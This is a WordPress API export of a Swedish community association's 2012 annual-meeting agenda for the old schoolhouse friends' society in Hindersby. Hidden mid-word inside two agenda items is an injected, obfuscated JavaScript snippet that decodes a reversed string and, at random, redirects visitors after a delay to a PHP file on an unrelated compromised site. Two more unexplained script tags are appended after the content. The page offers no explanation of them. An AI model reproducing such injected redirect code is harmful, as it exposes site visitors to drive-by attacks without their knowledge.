{"id":1001,"date":"2012-03-13T11:38:40","date_gmt":"2012-03-13T09:38:40","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1001"},"modified":"2012-03-13T11:41:28","modified_gmt":"2012-03-13T09:41:28","slug":"gfv-arsmote-2012-foredragningslista","status":"publish","type":"page","link":"https:\/\/hindersby.net\/nywp\/?page_id=1001","title":{"rendered":"GFV \u00e5rsm\u00f6te 2012 f\u00f6redragningslista"},"content":{"rendered":"<div>\n<p>F\u00f6redragningslista<\/p>\n<p dir=\"ltr\">vid Gamla folkskolans v\u00e4nner i Hindersby \u00a0r.f \u00a0\u00e5rsm\u00f6te den 18 mars 2012 kl 14.00 p\u00e5 Gamla folkskolan i Hindersby<\/p>\n<p dir=\"ltr\">\u00a71\u00a0 M\u00f6tet \u00f6ppnas.<\/p>\n<p dir=\"ltr\">\u00a72\u00a0 Val av m\u00f6tesordf\u00f6rande, sekreterare, tv\u00e5 pro<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tokolljusterare och vid behov r\u00f6str\u00e4knare.<\/p>\n<p dir=\"ltr\">\u00a73\u00a0 M\u00f6tets laglighet och beslutf\u00f6rdhet konstateras.<\/p>\n<p dir=\"ltr\">\u00a74\u00a0 F\u00f6redragningslistan f\u00f6r m\u00f6tet godk\u00e4nns.<\/p>\n<p dir=\"ltr\">\u00a75\u00a0 Bokslutet, \u00e5rsber\u00e4ttelsen och \u00a0verksamhetsgranskarnas\/revisorernas utl\u00e5tande presenteras.<\/p>\n<p dir=\"ltr\">\u00a76\u00a0 Besluts om fastst\u00e4llande av bokslutet och beviljande av ansvarsfrihet till styrelsen och andra ansvarsskyldiga.<\/p>\n<p dir=\"ltr\">\u00a77\u00a0 Verksamhetsplanen, budgeten samt anslutnings- och medlemsavgifternas s<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>torlek fastst\u00e4lls.<\/p>\n<p dir=\"ltr\">\u00a78\u00a0 Val av styrelsens ordf\u00f6rande och \u00f6vriga styrelsemedlemmar.<\/p>\n<p dir=\"ltr\">\u00a79\u00a0 Val av en eller tv\u00e5 verksamhetsgranskare och hans\/deras suppleanter eller en revisor eller tv\u00e5 revisorer och hans\/deras suppleanter.<\/p>\n<p dir=\"ltr\">\u00a710\u00a0 Behandlas \u00f6vriga i m\u00f6teskallelsen n\u00e4mnda \u00e4renden<\/p>\n<p dir=\"ltr\">\u00a711\u00a0 M\u00f6tets avslutning<\/p>\n<p dir=\"ltr\">Enligt uppdrag<br \/>\nSekreteraren<\/p>\n<\/div>\n<p><script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>F\u00f6redragningslista vid Gamla folkskolans v\u00e4nner i Hindersby \u00a0r.f \u00a0\u00e5rsm\u00f6te den 18 mars 2012 kl 14.00 p\u00e5 Gamla folkskolan i Hindersby \u00a71\u00a0 M\u00f6tet \u00f6ppnas. \u00a72\u00a0 Val av m\u00f6tesordf\u00f6rande, sekreterare, tv\u00e5 protokolljusterare och vid behov r\u00f6str\u00e4knare. \u00a73\u00a0 M\u00f6tets laglighet och beslutf\u00f6rdhet konstateras. \u00a74\u00a0 F\u00f6redragningslistan f\u00f6r m\u00f6tet godk\u00e4nns. \u00a75\u00a0 Bokslutet, \u00e5rsber\u00e4ttelsen och \u00a0verksamhetsgranskarnas\/revisorernas utl\u00e5tande presenteras. \u00a76\u00a0 Besluts om &hellip; <a href=\"https:\/\/hindersby.net\/nywp\/?page_id=1001\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dGFV \u00e5rsm\u00f6te 2012 f\u00f6redragningslista\u201d<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1004,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1001","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1001"}],"version-history":[{"count":2,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1001\/revisions"}],"predecessor-version":[{"id":1006,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1001\/revisions\/1006"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1004"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}